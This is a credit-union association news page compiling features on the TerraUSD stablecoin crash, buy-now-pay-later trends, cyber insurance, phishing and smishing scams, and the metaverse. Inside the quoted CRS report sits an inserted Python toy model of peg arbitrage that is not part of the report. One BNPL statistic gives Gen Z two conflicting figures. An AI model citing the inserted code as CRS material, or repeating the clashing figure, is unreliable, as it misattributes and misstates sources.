What Happened with the TerraUSD Collapse? CRS Notes “Run-like” Risk

Previously featured articles are being migrated to the NASCUS Digital Library, cataloged by topic. For additional news, research, reports, and industry announcements featured in NASCUS Report click here.

May 19, 2022 Feature: “Run-like” Risk and Policy Proposals Noted in the Congressional Research Service Report on the TerraUSD Crash

May 16, 2022 — The Congressional Research Service (CRS), a legislative agency that supports the United States Congress, has published a report (posted below) that outlines algorithmic stablecoins and the key factors in the TerraUSD (UST) crash. CRS describes the UST crash as a “run-like” scenario and discusses the policy issues connected to the risk of such events.


Related Reading links and summaries appear below. They cover crypto regulation legislation, lobbying efforts, and the SEC’s plan to hire more “Crypto Cops” to fight digital fraud.


What Are Algorithmic Stablecoins?
Stablecoins are a type of cryptocurrency that aim to maintain a stable value. There are several classes of stablecoins that each use different methods to try to achieve this, one of which is algorithmic stablecoins. While no precise definition captures all of their features, algorithmic stablecoins typically use an algorithm or smart contract to manage the supply of tokens and guide their value to some reference asset (for example a fiat currency, such as the U.S. dollar). Algorithmic stablecoins generally do not attempt to achieve value by holding a reserve of fiat-denominated assets with a value in a 1:1 relationship with the value of the stablecoin. Instead, algorithmic stablecoins use different mechanisms to control the supply or value of the stablecoin, including the minting or burning of coins, rebasing, and arbitrage.

What Happened with TerraUSD?
The TerraUSD (UST) stablecoin uses an arbitrage mechanism typical of some algorithmic stablecoin arrangements, consisting of two coins or tokens: the stablecoin, in this case UST, meant to maintain a stable value or “peg,” and a balancer token, in this case LUNA, the value of which can fluctuate. An algorithm manages the relationship between these two coins to try to keep the stablecoin pegged to the reference. If strong demand pushed the price of UST above its peg, arbitrageurs could buy $1 worth of LUNA, trade it for 1 UST (worth more than $1) and sell the UST for a gain. If UST falls below $1, someone can buy $0.99 worth of UST and trade it for $1 worth of LUNA. In both instances arbitrageurs net a profit and ostensibly maintain the peg.
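The two-token arbitrage described above, as a constructed toy model added here (it is not Terra’s own protocol code): `TwoTokenPeg`, `arb_profit_above_peg`, `arb_profit_below_peg` and `simulate_run` are hypothetical names, and the constant-product price-impact rule inside `redeem_stable` is an assumption chosen so the reflexive loop behind a run becomes visible.

```python
"""Constructed toy model of a stablecoin/balancer mint-and-burn peg.

Added illustration only: the redemption rule ($1 of balancer per stablecoin)
follows the CRS description; the price-impact rule is an assumption.
"""
from dataclasses import dataclass


@dataclass
class TwoTokenPeg:
    balancer_price: float            # market price of the balancer token, USD
    stable_supply: float = 0.0       # outstanding stablecoins
    balancer_supply: float = 0.0     # outstanding balancer tokens
    pool_depth: float = 1_000_000.0  # constructed liquidity parameter (balancer units)

    def mint_stable(self, usd_of_balancer: float) -> float:
        """Burn $usd_of_balancer of balancer and mint that many stablecoins at par."""
        burned = usd_of_balancer / self.balancer_price
        self.balancer_supply -= burned
        self.stable_supply += usd_of_balancer
        return usd_of_balancer

    def redeem_stable(self, stable_amount: float) -> float:
        """Burn stablecoins and mint $1 of balancer per coin at the current price.

        Assumption: the freshly minted balancer is sold into a constant-product
        style pool, so its price falls by pool_depth / (pool_depth + minted).
        The lower the price, the more balancer the next redemption mints.
        """
        minted = stable_amount / self.balancer_price
        self.stable_supply -= stable_amount
        self.balancer_supply += minted
        self.balancer_price *= self.pool_depth / (self.pool_depth + minted)
        return minted


def arb_profit_above_peg(peg: TwoTokenPeg, stable_price: float, usd: float = 1.0) -> float:
    """Stablecoin above $1: buy $usd of balancer, mint stablecoins, sell them at market."""
    coins = peg.mint_stable(usd)
    return coins * stable_price - usd


def arb_profit_below_peg(peg: TwoTokenPeg, stable_price: float, usd: float = 1.0) -> float:
    """Stablecoin below $1: buy stablecoins with $usd, redeem each for $1 of balancer."""
    coins = usd / stable_price
    price_before = peg.balancer_price       # small trade: sell at the pre-trade price
    minted = peg.redeem_stable(coins)
    return minted * price_before - usd


def simulate_run(peg: TwoTokenPeg, redemption_per_step: float, steps: int) -> list:
    """Repeated large redemptions. Returns (balancer_price, balancer_minted) per step.

    Each step mints more balancer than the last because the previous step
    pushed the balancer price down: the feedback loop of a run.
    """
    path = []
    for _ in range(steps):
        minted = peg.redeem_stable(redemption_per_step)
        path.append((round(peg.balancer_price, 2), round(minted)))
    return path


if __name__ == "__main__":
    # Constructed starting state: balancer at $100, no coins outstanding.
    print("above-peg arb profit per $1:", arb_profit_above_peg(TwoTokenPeg(100.0), 1.02))
    print("below-peg arb profit per $1:", arb_profit_below_peg(TwoTokenPeg(100.0), 0.99))
    for price, minted in simulate_run(TwoTokenPeg(100.0), 10_000_000.0, 5):
        print(f"balancer price {price:>8.2f}  minted this step {minted:>9,}")
```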

Over the past week, UST lost its peg to the dollar (Figure 1), and both UST and balancer coin LUNA were dropped from various cryptocurrency exchanges. UST hit a low of $0.12 at 9 a.m. on May 16, 2022.

Source: CoinMarketCap.


There are two other factors relevant to this incident.

First, Terraform Labs, the UST stablecoin manager, established Anchor, a decentralized lending protocol in which UST holders could park their UST for a reported 20% annual percentage yield. This protocol attracted demand for UST because of high yields. However, Anchor experienced sizeable UST withdrawals late last week foreshadowing the depegging. Also, in early 2022, Terraform Labs began purchasing bitcoin to hold in the Luna Foundation Guard (LFG) in response to some concerns about the peg. The LFG could sell bitcoin to prop up the stablecoin and defend the peg, which it claims to have done during the selloff but about which there is some skepticism.

Policy Issues Relating to the “Run” Risk
UST had a market capitalization of more than $18 billion in early May. Some observers voiced financial stability concerns because of UST’s contagion effects on other crypto assets and the crypto ecosystem’s interconnectedness with the traditional financial system. The sudden drop in UST’s prices reflects a classic “run-like” scenario, where a large number of investors withdraw their investments simultaneously, triggering negative feedback loops and contagion effects.

Global Financial Stability Report

Some argue that stablecoins could be subject to runs if coin holders have suspicions about the reserve assets backing the par value. Such run-like behavior has already occurred for algorithmic stablecoins during relatively calm market conditions; vulnerabilities of this kind are generally expected to cascade and become more consequential during broader market distress.

The UST event is not the first time an algorithmic stablecoin displayed run-like behavior. The Iron Titanium (TITAN) token faced a run-like scenario in June 2021 and saw its price crash to near zero within one day. Similar to how UST functions with LUNA, the algorithmic stablecoin Iron is partially supported by TITAN. Because Iron is structured using TITAN and USD Coin, when TITAN’s price collapsed, Iron was trading off the peg by more than a quarter (Figure 2).

Many observers consider the stablecoin industry inadequately regulated. While in the traditional financial system a run-like scenario could be somewhat mitigated by regulatory safeguards and backstops, the stablecoin industry has not incorporated such measures. For example, in the traditional financial system, bank deposit insurance and liquidity facilities can reduce market participants’ incentives to run. For more background, see the CRS products Stablecoins: Background and Policy Issues and How Stable Are Stablecoins?

Policy Proposals
Recent legislative proposals have considered what entities should be allowed to issue stablecoins, the reserves needed to back a stablecoin, and the disclosures that stablecoin issuers should have to make available. Committees in both the Senate and House have held hearings on stablecoins where the reserves backing these digital assets were a central issue.

With respect to reserve disclosure and composition, there have been a few recent legislative proposals. In March 2022, Representative Hollingsworth introduced H.R. 7328, which would establish auditor-verified reporting requirements for stablecoin issuers and restrict the assets that could back a stablecoin. Senator Hagerty introduced a Senate version of the bill, S. 3970, in May 2022. There have also been some discussion drafts in the House and Senate. These discussion bills provide a possible framework for stablecoin issuers. For example, while the drafts differ in their approach, they would establish which institutions are eligible to issue stablecoins, create disclosure requirements for the assets backing stablecoins, provide standards for the composition of those reserves, and consider avenues for financial backstops for stablecoins.

Regulators have also taken measures to address the risks associated with stablecoins. For example, in addition to the President’s Working Group report on stablecoins, the banking regulators have jointly participated in “policy sprints” focused on crypto assets, including stablecoins. Additionally, last year, the Basel Committee on Banking Supervision released a consultative document on prudential treatment of crypto exposures for public comment, and they are expected to finalize their consultative framework this year. The Department of the Treasury is reportedly working on a report on TerraUSD.


Related Readings:

  • Cryptocurrencies Melt Down in a ‘Perfect Storm’ of Fear and Panic: A steep sell-off that gained momentum this week starkly illustrated the risks of the experimental and unregulated digital currencies.
    The price of Bitcoin plunged to its lowest point since 2020. Coinbase, the large cryptocurrency exchange, tanked in value. A cryptocurrency that promoted itself as a stable means of exchange collapsed. And more than $300 billion was wiped out by a crash in cryptocurrency prices since Monday. The crypto world went into a full meltdown this week in a sell-off that graphically illustrated the risks of the experimental and unregulated digital currencies.
  • U.S. Senate Crafting Crypto Regulatory Legislation
    A bipartisan group of U.S. senators plans to release a long-sought framework for regulating the volatile cryptocurrency market next week amid signs of market chaos. The group will release the draft for public comment and introduce a formal bill as soon as 30 days afterward, according to Sen. Cynthia Lummis (R-WY), who said she will sponsor the legislation along with Sen. Kirsten Gillibrand (D-NY) and several other senators, joining at least one other crypto bill floating around the Senate, that one introduced by Sen. Pat Toomey (R-PA).
  • U.S. Crypto Lobbyists in Push to Contain Fallout from Stablecoin Meltdown
    The Blockchain Association and the Chamber of Digital Commerce, which represent some of the most influential crypto companies, say they have been fielding a flurry of questions from Capitol Hill since TerraUSD, known as “UST,” broke its peg last week and crashed 90%. Capitol Hill lawmakers have been quizzing lobbyists on the structure of UST, seeking to determine whether its collapse was preventable and if other stablecoins could suffer the same fate.
  • SEC to Hire More Cryptocurrency Cops to Fight Digital Frauds
    The Securities and Exchange Commission will boost the size of its special unit devoted to investigating cryptocurrency frauds and other misconduct, a move that follows the agency’s aggressive push to get the unregulated industry to come under federal supervision. The commission has positioned itself as the chief government bulwark against fraud in the $1.7 trillion market, which so far has sidestepped most federal consumer- and investor-protection rules. SEC Chairman Gary Gensler says the crypto industry is rife with fraud and abuse, likening it to the “Wild West.”


May 13, 2022 Feature:
2022 Buy Now, Pay Later Apps, Trends & Statistics

If any payment option has ‘become trendy,’ it would be buy now, pay later (BNPL).
Unfortunately, according to a recent article, 45% of survey respondents use BNPL to make purchases that don’t fit within their budget. This feature explores current patterns, trends, and statistics on app usage and purchase patterns, spending habits, and generational breakouts.

Related Reading:


According to NerdWallet’s Jackie Veling, these are the top 6 BNPL apps in 2022 recommended to their readers:

  1. Afterpay: Best for no credit check. Unlike most BNPL providers, Afterpay doesn’t interact with the credit bureaus. The lender will not conduct a soft credit pull on your application or report on-time or missed payments to the bureaus.
  2. Affirm: Best for large purchases. Affirm operates as a more traditional loan product. It offers longer terms and negotiates the interest rate with each retailer. If you’re looking to fund a larger purchase, like a mattress or computer, an Affirm loan may have more affordable payments spread out over a longer period.
  3. Klarna: Best for earning rewards. Klarna offers three payment plans, including the popular pay-in-four model, its Pay in 30 model and a monthly financing option. After downloading the mobile app, users can join Vibe — a free rewards program with access to exclusive sales. The program awards one vibe per dollar spent, and vibes can be turned into rewards, like gift cards.
  4. Zip (formerly Quadpay): Best for wide availability. Zip, formerly known as Quadpay, is available anywhere Visa is accepted. After downloading the mobile app, you can pay with your debit or credit card or generate a virtual Zip card that can be used in stores.
  5. PayPal Pay in 4: Best for peace of mind. PayPal offers a BNPL payment plan to users who have a PayPal account and are in good standing. Along with the name recognition that may put new BNPL users at ease, the company extends its PayPal Purchase Protection to its BNPL plan. That means if you don’t receive your item or it’s different from the description, you may qualify for reimbursement from PayPal.
  6. Sezzle: Best for socially conscious shoppers. If you want your BNPL dollars to go further, Sezzle might be a good option. Sezzle is a certified B Corporation, a designation that required the lender to pass a rigorous assessment and show a demonstrated commitment to social and environmental issues. This feature is unique among BNPL lenders.

Read more from NerdWallet here.


“More than 30 Buy Now, Pay Later Trends & Statistics for Banks in 2022”
Courtesy of Garret Reich, The Financial Brand

BNPL Growth Projections

The number of U.S. buy now, pay later users is projected to soar from 1.6 million in 2018 to 59.3 million in 2022, driven by innovations in credit access and purchase flexibility. Growth will likely taper through 2025, however, as BNPL enters a post-regulation maturity phase.1

  • BNPL offerings will account for an impressive $680 billion in transaction volume worldwide in 2025.2
  • Buy now, pay later usage is expected to increase by 20.7% between 2021 and 2028.3
  • U.S. BNPL transaction volume is projected to surpass the $100 billion mark annually by 2024, up from $55 billion in 2021.4
  • BNPL payments are expected to account for nearly a quarter of all global ecommerce transactions by 2026, up from just 9% in 2021.5

Why Customers Buy with BNPL

The most common reason to use buy now, pay later services is to make purchases that don’t fit in one’s budget — 45% of respondents have used it for this reason.6

Why customers use BNPL versus credit cards

  • Buying electronics is the most common use of buy now, pay later, with nearly half (48%) of BNPL users saying they’ve used it for that reason.6
  • 71% of Americans who visit the dentist frequently would use BNPL over traditional payment methods.7
  • 86% of pet owners would choose BNPL in place of traditional payment methods to help pay for future vet costs.7

How Often People Turn to BNPL

  • Nearly three out of five buy now, pay later users (56%) prefer BNPL to credit cards.8
  • 38% of users say buy now, pay later will eventually replace their credit cards.6
  • Two in three Americans are more interested in BNPL in 2022 than before the pandemic.7
  • Of consumers who use BNPL services, nearly three out of ten people (29%) use it at least once a month. 51% of people use buy now, pay later services once every three to six months.8

How often people use BNPL services when shopping online

  • Of people who use BNPL, over two thirds (67%) use BNPL when shopping online at least half the time.8
  • 53% of respondents who have never used buy now, pay later say they’re at least somewhat likely to use it within the next year.6

A Deeper Look Into the Consumers Using BNPL

  • The average amount of the last item BNPL users purchased was $689.8

People don’t open buy now, pay later contracts one at a time. Any one BNPL user is paying for an average of four items (3.8) at any given time.8

How much consumers spend each month on BNPL payments

  • 61% of buy now, pay later users would rather use a BNPL service offered directly from the retailer they’re buying from than go through a third party.6
  • People whose buy now, pay later behavior was included in credit scoring models saw an average credit score improvement of 13 points. People with credit records of two years or less saw a greater increase, on average 21 points.11

Demographics of BNPL Customers

More than 45 million people age 14 and older in the U.S. were expected to use buy now, pay later services by the end of 2021.12

Usage of buy now, pay later providers, by generation

  • 44% of Gen Z is predicted to use BNPL at least once in 2022. That compares to 37% of Millennials, 23% of Gen Z and 9.4% of Baby Boomers.12
  • By 2025, nearly 30% of BNPL users will be Gen X and Baby Boomers.12
  • 10% of Gen Z say they would use buy now, pay later for a $500 purchase.13
  • Buy now, pay later users age 18 to 24 are the most likely to pay $250 or more per month when they have a BNPL payment.6

Sources: 1 eMarketer, 2 Insider Intelligence, 3 EY, 4 Mercator, 5 Juniper Research, 6 Ascent, 7 OPY, 8 C+R, 9 Woolard Review, 10 Nerdwallet, 11 Equifax, 12 eMarketer, 13 Alliance Data Systems

Click here to read the entire article


May 6, 2022 Feature: Cyber Insurance Experts Discuss Emerging Market Trends in Attacks and Coverage

Courtesy of Stephen Lawton, Sophos

Experts included Marc Schein, national co-chair of the Cyber Center of Excellence at the world’s largest insurance broker, Marsh McLennan Agency (MMA); James Tuplin, head of international at next-gen speciality insurer Mosaic Insurance; Natalie Graham, head of claims at Mosaic Insurance; Daniel Kasper, cyber risk researcher and economist at Cyber Economics; and Nicholas Cramer, senior director of global cyber risk partnerships at Sophos.

Watch on-demand discussion here.

Related readings:

Experts Offer Advice on Cyber Insurance Trends, Qualifying for Coverage

Qualifying for a cyber insurance policy today can be a challenging and tedious process. Gone are the days when a simple phone call to an insurance agent and selecting coverage limits led to obtaining a policy. Today, due to the sharp increase in ransomware attacks and multimillion-dollar payouts, along with the stricter cybersecurity controls required by underwriters, obtaining cyber insurance is an essential objective and corporate imperative for organizations, but not a certainty.

The Economics of Cyber Insurance

Laying the baseline for emerging trends in the cyber insurance market, Schein said the cost of insured cyberattacks grew by 22% in 2020 and 77% in 2021, but rates for cyber insurance grew much faster. In September 2021, the average rate increase was 128% while the capacity offered — the limits insurance companies were willing to offer — dropped by 23%. The combination of higher rates and reduced coverage effectively is driving up the cost of insurance significantly, he said.

Economist Kasper agrees. The honeymoon in which organizations obtained cyber insurance at a relatively low price for hefty amounts of coverage is likely gone forever. Now that insurers have had a chance to better judge the market dynamics, as well as the relative levels of cybersecurity controls in place at many of the organizations seeking insurance, the stark realities are coming into focus, and it is not good news for those who are shopping for policies.

“In 2013, we had about a billion dollars in global insurance premiums in cyber,” Kasper said. “The next six years the market grew by roughly 30% annually, but at the end of 2019 COVID-19 hit and ransomware skyrocketed.”

Looking at 2018 before ransomware attacks became so prevalent, he said, a cyber insurance carrier would have significantly underpriced the premium cost for a cyber insurance policy for 2019 because the carriers did not have the threat vector for the new ransomware attacks in the pricing model. The market is now addressing those losses in pricing changes.

“We are now in the renewals for 2021 and 2022 and from everything that we have heard so far on the market this year, in 2023, it will be even harsher,” Kasper said. “It is now a seller’s market.”

If organizations want to buy cyber insurance today, they must show proactive cybersecurity preparations beyond what they had “three or four years ago when you got basically cyber insurance, sometimes even without any security scans or any meaningful information that you had to divulge,” he added.


Rising Rates for Less Coverage

Schein told the attendees that “perhaps the most talked about conversation within cyber risk today is around systemic types of loss and systemic risk.” He noted that increased awareness of supply-chain-based attacks is causing volatility in the market. Attacks such as SolarWinds, cybercriminals breaching Microsoft Exchange, and Log4j “started to cause havoc for the insurance marketplace.”

To qualify for cyber insurance today, Schein emphasized the need to put in place 12 security controls that address very basic cyber security. These controls are “absolutely critical for businesses that are looking to apply for insurance and or increase the current limits that they currently have. And then from a coverage standpoint, we’ve spoken about carriers are now starting to scale back coverage. The market is starting to harden and you’re starting to see prices increasing.”

The first five controls, highlighted in orange, are essential before MMA will sit down with a prospective client, he said. The other seven controls also are crucial, but MMA will consider submitting an insurance policy to underwriters even if not every blue control is in place.

That said, cyber insurance carriers simply will not offer a policy if the prospect is not willing to put forth the effort to reduce their risk. “[Cyber insurance carriers] can’t charge enough to make up for poor [security] controls,” he said.


Business Interruption

While brokers such as MMA have their own requirements to consider before submitting an insurance application to underwriters, it is the carriers for whom the underwriters work and who decide if an application is approved or not.

Mosaic’s Tuplin said most insurers find that organizations seeking insurance are most concerned about business interruption first due to ransomware and then data breaches or misuse of data. In order to identify the appropriate policy for a prospective customer, Tuplin said Mosaic uses three core triggers to determine the coverage the cyber insurance policy offers.

The first trigger is security failure, which is the inability of your IT security to stop an event. An example of a security failure is a virus that stops your system from working correctly. Taking security failure to the next level, you come to the second trigger: system failure. An example of system failure is turning on your computer, but nothing happens at all, he said. The third trigger, which formerly was part of system failure but now is a discrete trigger, is ransomware.

“We’ve split that out as an industry so that insurers can choose whether to include or exclude that as a trigger within their policies,” Tuplin said. “It will make your policy more expensive to include it, but it’s generally the area you want to cover most.”

The base area of coverage in a cyber policy is if it affects the organization’s own IT systems, he noted. That would include software that runs on-premises on workstations and servers, as well as networking equipment. The second level of coverage addresses key partners’ systems — an outsourced IT system. This could include cloud services or perhaps a payment system for a retail customer.

“What you have to think about is if an event such as a virus affects that payment processor, rather than affecting your own IT systems,” Tuplin said. “Do you want that to be covered within your policy? It is an extension of coverage, but it is a very important one and it is one that most people do opt to purchase.”

The third area is the most extreme version of business interruption — an interruption to any service provider’s operations. He used the example of an automobile manufacturer that was unable to obtain specific parts because of a cyberattack on that partner’s manufacturing operations. A car manufacturer cannot ship a car without brakes, so a business continuity interruption due to an attack on a third party that directly impacts the insured’s ability to make its products is a covered event.


Data Breaches

A data breach simply refers to information that should have been private being disclosed and perhaps made public. Tuplin used credit card data, legal documents, healthcare records and passport information as common types of private data that are obtained by someone who is not supposed to have them. Private data that is made public or is stolen triggers the data breach element of a cyber insurance policy, he noted.

Data misuse is another component of a breach. If the owner of private data tells a company not to disclose or sell their private data but the company does so anyway, that disclosure triggers the data breach portion of a cyber policy as well.

“We don’t care how the data was breached, cyber policies will cover it,” he said. Beyond how the data was compromised, the cyber insurance policy is also not concerned with where the data was breached. The policy will pay whether you store data on your server or in the cloud. Each misuse still triggers the policy, he noted.

When triggered, the policy covers notification costs, which can be quite expensive. Both the European Union’s General Data Protection Regulation (GDPR) and the U.S. Health Insurance Portability and Accountability Act of 1996 (HIPAA) require informing anyone whose personally identifiable information (PII) has been compromised.

Cyber insurance also generally pays for investigating and identifying how an attacker got into the network and if they are still there. It also pays for identifying exactly what was compromised and reporting to regulators. Insurance companies generally have teams of attorneys who step in to handle all the required legal work from disclosure to reporting to handling covered lawsuits.

In some jurisdictions, where the practice is legal, the insurance company might also pay any extortion fees. That can be problematic in such countries as the United States and Italy where government regulations do not permit payments to sanctioned organizations, which could include organized crime, foreign criminal organizations and some foreign state-sponsored groups and terrorists.

Tuplin noted that it can be difficult to determine at first blush the kinds of data a company needs to protect. He cited the example of a small company that had just a handful of employees with roughly £4.5 million in sales, but the company had data on more than half of the population of Great Britain. When a company takes out a policy to protect its most important data, it is essential to know exactly what that entails. In the case of this small British firm, he said, it would be the database with the pertinent information on the citizenry that was the company’s core data.

Being clear on exactly what your organization needs to protect will go a long way to ensure that your cyber insurance policy is written so that it covers exactly what you need protected.


Paying Claims

Cyber insurance, like other business functions, is shrouded in its own myths. One popular story, according to Mosaic’s Graham, is that organizations do not need cyber coverage because their other insurance will cover cyber events. That generally is not accurate, she said.

While some policies might have a small amount of cyber coverage, it normally is insufficient to meet the very high costs related to cyberattacks. Popular business coverage, such as errors and omissions, key person insurance, general liability, commercial property and other kinds of business policies, simply is not designed to address the specific risks a cyber insurance policy covers.

“Other than a standalone cyber insurance policy, there is no other policy that will cover you for data breaches, data misuse, ransomware, malware, everything that we’ve talked about,” she said.

It is important to notify the insurance company if there is a breach or ransomware attack, even if the company plans to cover the loss themselves. During the investigation and mitigation process, the investigators might find additional damage the organization was not aware of from the attack. Additionally, all discussions with attorneys are protected by attorney/client privilege so no secrets can be disclosed in case of a lawsuit.

Another myth Graham dispelled is that insurance companies do not pay claims for cyberattacks. That, she said, is simply incorrect, as is the notion that filing a claim is difficult. “If you avail yourself of the tools that are available, it is straightforward,” she said.

“Ransomware is far and away the largest cause of cyber claims at the moment,” Graham added. “It is prevalent, but the cyber insurance does cover it. Ransomware itself can also be accompanied by data breaches.”

If an attacker installs ransomware and at the same time steals data and essentially holds that data to ransom, you have two actions — introduction of ransomware and a data breach with extortion. However, she noted, they are not necessarily two totally distinct events.

A lot of organizations think, “I don’t need cyber insurance because my environment is secure,” Graham continued. “But it isn’t just your environment that you need to be concerned about. While your environment might be safe, you still need to be concerned with your third-party suppliers and services and other organizations that you rely on to carry out your business. So, if any of those are hit by any kind of incident, then it can have a knock-on effect.”

Hoping to put at rest the concern that cyber insurance was an unnecessary expense, she noted: “If you suffer a cyber event, you will be covered. And your insurance company, as long as they are reputable, will pay.”



April 29, 2022 Feature:
Think It Can’t Happen to You?
Spoofing, Phishing, and Smishing

Related Readings:


Social Media a Gold Mine for Scammers
According to a data spotlight authored by the Federal Trade Commission, “Social media permeates the lives of many people – we use it to stay in touch, make new friends, shop, and have fun. But reports to the FTC show that social media is also increasingly where scammers go to con us. More than one in four people who reported losing money to fraud in 2021 said it started on social media with an ad, a post, or a message. In fact, the data suggest that social media was far more profitable to scammers in 2021 than any other method of reaching people.

Social Fraud

More than 95,000 people reported about $770 million in losses to fraud initiated on social media platforms in 2021. Those losses account for about 25% of all reported losses to fraud in 2021 and represent a stunning eighteen-fold increase over 2017 reported losses. Reports are up for every age group, but people 18 to 39 were more than twice as likely as older adults to report losing money to these scams in 2021.

For scammers, there’s a lot to like about social media. It’s a low-cost way to reach billions of people from anywhere in the world. It’s easy to manufacture a fake persona, or scammers can hack into an existing profile to get “friends” to con. There’s the ability to fine-tune their approach by studying the personal details people share on social media. In fact, scammers could easily use the tools available to advertisers on social media platforms to systematically target people with bogus ads based on personal details such as their age, interests, or past purchases.”


Fishing with Fake Accounts
Courtesy of Rachel DePompa and Daniela Molina, Gray Media Group, “Faked Out: Con artists copycatting social media profiles lure family and friends into scams”

Your pictures, your videos, your memories – all come together to create your social media identity. The authors have uncovered scammers targeting your online accounts to create a whole new you, all designed to scam your closest friends out of their money.

In the tech world it’s called “spoofing,” a hacking technique where scammers take your online content and create a duplicate fake profile with the goal of drawing your friends and followers into a web of deceit.

According to Facebook’s transparency page, in late 2021 around five percent of monthly active users worldwide were fake, which means there were around 140 million fake accounts at any given time. Meta, Facebook and Instagram’s parent company, said it took action against 1.7 billion fake Facebook accounts during that same time.

How can you protect yourself? Report the duplicate account to the social media company and follow the steps listed on its website. Then:

  1. Go into Settings and make your account private (for the time being)
  2. Set up two-factor authentication on all your social media devices
  3. Freeze your credit (even your dependents and children too)
  4. Report identity theft to the IRS to prevent hackers from committing crimes under your name

Baiting with Bitcoin

James Lee, COO of Identity Theft Resource Center (ITRC), said once scammers create the fake account, they will post on Instagram about Bitcoin investments to attract other users. Anyone who clicks on certain links in that post automatically shares their credentials. At that point, hackers can step in and message the followers of anyone who clicked on the link to join the Bitcoin scam.

According to cybersecurity firm Digital Shadows, the cost of a hacked Instagram account on the dark web is $45. ITRC said it received 316 complaints about social media account takeovers in 2021. Already in 2022, the organization has seen 201 complaints, an 11% increase from this time last year.


Smishing: Phishing with a Different Bait
Courtesy of David Lott, Federal Reserve of Atlanta

The Retail Payments Risk Forum team is always on the lookout for changes in attack patterns by the criminal element regarding payments. Our sources of research include industry news, networking with payments stakeholders, third-party reports, and our internal security warnings. One other source we have is our own personal experience.

Unlike phishing, which uses email, smishing uses SMS text messages to entice you to click on a malicious link that either loads malware on your phone or, more likely, directs you to a fake website to capture your login information. (Simply opening the text message poses little risk.)

A cybersecurity firm that claims to handle 80 percent of mobile messages in North America has reported that the number of smishing attacks during the third quarter of 2020 had increased 328 percent over the previous quarter. The FBI’s Internet Crime Complaint Center (IC3) doesn’t separate smishing from phishing, vishing (phone calls), or pharming (redirection to a fake website) incidents, but the IC3’s Internet Crime Report 2021 shows that these complaints increased 34 percent from 2020 to 2021.

The warning signs for a smishing message are quite similar to those of a phishing attack and may include the following:

  • A sense of urgency, pushing you to respond right away. As we are now in income tax season, these messages may include references to past due taxes or a suspended refund.
  • An offer of a reward such as a gift card, rebate, or a coupon for a future purchase from the retailer
  • Poor English grammar or improperly formatted phone numbers
  • An unknown sender. It is best to report or delete messages you weren’t expecting from people you don’t know.

Be aware that what appears to be the sender’s phone number is often spoofed. It may be a familiar number or at least may have a local area code. This is intended to increase your trust and thus the likelihood that you will respond.

Likewise, the measures that protect you against a smishing attempt are similar to the safeguards you already take against phishing:

  • Keep your mobile device software and browsers updated with the latest security upgrades.
  • If you are in doubt about the legitimacy of the message, do not use the link or phone number provided in the text to contact the sender. If the message appears to be from someone you know or a business you are familiar with, find their number in your contacts or online and contact them directly.

Phishing During the Great Resignation: LinkedIn Accounts for Half of all Phishing Attempts Worldwide
Courtesy of the Check Point Blog 

Check Point Research issued its Q1 Brand Phishing Report, highlighting the brands that criminals most frequently imitated in their attempts to steal individuals’ personal information or payment credentials during January, February and March 2022.

Social media networks have now overtaken shipping, retail and technology as the category most likely to be targeted by criminal groups.

So far this year, LinkedIn has been related to more than half (52%) of all phishing-related attacks globally, marking the first time the social media network has reached the top of the rankings. It represents a dramatic 44% uplift from the previous quarter, when LinkedIn was in fifth position and related to only 8% of phishing attempts. LinkedIn has now overtaken DHL as the most targeted brand; DHL has fallen to second position and accounted for 14% of all phishing attempts during the quarter.

Top phishing brands in Q1 2022

Below are the top brands ranked by their overall appearance in brand phishing attempts:

  1. LinkedIn (relating to 52% of all phishing attacks globally)
  2. DHL (14%)
  3. Google (7%)
  4. Microsoft (6%)
  5. FedEx (6%)
  6. WhatsApp (4%)
  7. Amazon (2%)
  8. Maersk (1%)
  9. AliExpress (0.8%)
  10. Apple (0.8%)

Check Point’s data illustrates an emerging trend toward threat actors leveraging social networks, now the number one targeted category ahead of shipping companies and technology giants such as Google, Microsoft and Apple. As well as LinkedIn being the most targeted brand by a considerable margin, WhatsApp maintained its position in the top ten, accounting for almost 1 in 20 phishing-related attacks worldwide.


April 22, 2022 Feature: What is the Metaverse?


The Metaverse, Explained for People Who Still Don’t Get It
Courtesy of Shamani Joshi, Vice.com

Companies building each layer of the Metaverse.

Is it just a buzzword, the next internet, a video game, or an idea? We asked experts to break it down for us.

Whether you’ve come across Mark Zuckerberg’s eerie virtual replica as he unveiled Facebook-rebranded-as-Meta (we’re not getting used to this name any time soon though), live concerts in the immersive Fortnite universe, or a digital art gallery in Decentraland – there’s no escaping the internet’s favorite buzzword: the “Metaverse.”

But what even is this metaverse? Is it a virtual universe with endless possibilities we can escape into? Is it the dystopian future of the internet built on speculative sci-fi? Or is it just a fancy way of categorizing extended reality (XR) – an umbrella term encompassing augmented, virtual, and mixed reality technologies?

Talking about the metaverse feels a lot like talking about the internet back in the 70s and the 80s. As the building blocks of the new form of communication were being laid down, it sparked speculation around what it would look like and how people would use it. Everyone was talking about it but few knew what it really meant or how it would work. Looking back, it didn’t turn out exactly as some people imagined.

However, with the metaverse pegged to become an $800 billion market by 2024, and with tech giants like Facebook, er, Meta, Microsoft, Apple and Google investing big money in making it a reality, it’s time to find out what this vague and complex term means.

So, we got a bunch of experts to break it down for those who still don’t get what the metaverse is all about, AKA most of us.


So, what exactly is the metaverse? 

While the term has been floating around for the last few years, the word “metaverse” was actually coined by author Neal Stephenson in his 1992 sci-fi novel Snow Crash. In his book, Stephenson referred to the metaverse as an all-encompassing digital world that exists parallel to the real world. But in 2022, experts still aren’t sure whether the metaverse IRL could evolve into something similar.

“The metaverse is a 3D version of the Internet and computing at large,” Matthew Ball, a venture capitalist and angel investor who’s written a series of essays about the potential and structures of the metaverse, told VICE.

According to Ball, there are two ways to place this in the current context. “When these two technologies (internet and computing) first emerged, all interactions were primarily text-based (emails, messages, usernames, email addresses). Then they slowly became more media-based (photos, videos, livestreams). The next elevation of user interface and user experience is into 3D. Secondly, if we think of [a] mobile [phone] as placing a computer in our pocket and the internet being available at all times, think of the metaverse as always being within a computer and inside the internet.”

Many experts look at the metaverse as a 3D model of the internet. Basically, a place parallel to the physical world, where you spend your digital life. A place where you and other people have an avatar, and you interact with them through their avatars. Some also argue that the metaverse in the truest sense of the term doesn’t actually exist yet.

“It’s not real at this stage, and won’t become real until people have a single location they can go to to get into a virtual world they could live in,” Ibrahim Baggili, a cybersecurity expert and the founding director of the Connecticut Institute of Technology at the University of New Haven, told VICE.

Essentially, the metaverse is supposed to be a 3D version of the internet that is seen as the logical next stage of development, and would ideally be accessed through a single gateway.

